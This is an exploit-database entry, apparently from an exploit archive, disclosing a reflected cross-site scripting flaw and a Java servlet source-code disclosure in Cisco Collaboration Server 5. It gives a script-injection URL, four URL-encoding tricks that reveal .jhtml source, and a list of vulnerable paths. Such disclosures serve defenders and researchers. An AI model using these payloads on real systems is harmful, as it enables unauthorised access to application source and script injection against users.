[] NeoSense
E X P L O I T S
title author type platform port cve id

Cisco Collaboration Server 5 - Cross-Site Scripting / Source Code Disclosure

Author: s4squatch
type: webapps
platform: multiple
port: 80.0
date_added: 2010-02-10 
date_updated:  
verified: 1 
codes: OSVDB-62460;CVE-2010-0642;OSVDB-62459;CVE-2010-0641 
tags: 
aliases:  
screenshot_url:  
application_url: 
Cisco Collaboration Server 5 XSS, Source Code Disclosure

Discovered by:  s4squatch of SecureState R&D Team (www.securestate.com)

Discovered: 08/26/2008



Note: End of Engineering  -->  http://www.cisco.com/en/US/products/sw/custcosw/ps747/prod_eol_notice09186a008032d4d0.html

Replaced with: http://www.cisco.com/en/US/products/ps7233/index.html and http://www.cisco.com/en/US/products/ps7236/index.html





XSS

===

http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="><script>alert('xss!')</script>



Java Servlet Source Code Disclosure

===================================

The source code of .jhtml files is revealed to the end user by requesting any of the following:



Normal File:                        file.html



Modified 1:                                         file%2Ejhtml

Modified 2:                                         file.jhtm%6C

Modified 3:                                         file.jhtml%00

Modified 4:                                         file.jhtml%c0%80



Cisco Collaboration Server 5 Paths It Works On (list may not be complete)

=========================================================================

http://www.website.com/doc/docindex.jhtml

http://www.website.com/browserId/wizardForm.jhtml

http://www.website.com/webline/html/forms/callback.jhtml

http://www.website.com/webline/html/forms/callbackICM.jhtml

http://www.website.com/webline/html/agent/AgentFrame.jhtml

http://www.website.com/webline/html/agent/default/badlogin.jhtml

http://www.website.com/callme/callForm.jhtml

http://www.website.com/webline/html/multichatui/nowDefunctWindow.jhtml

http://www.website.com/browserId/wizard.jhtml

http://www.website.com/admin/CiscoAdmin.jhtml

http://www.website.com/msccallme/mscCallForm.jhtml

http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml



Related Public Info

===================

https://www.securityfocus.com/bid/3592/info

https://www.securityfocus.com/bid/1578/info

https://www.securityfocus.com/bid/1328/info
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.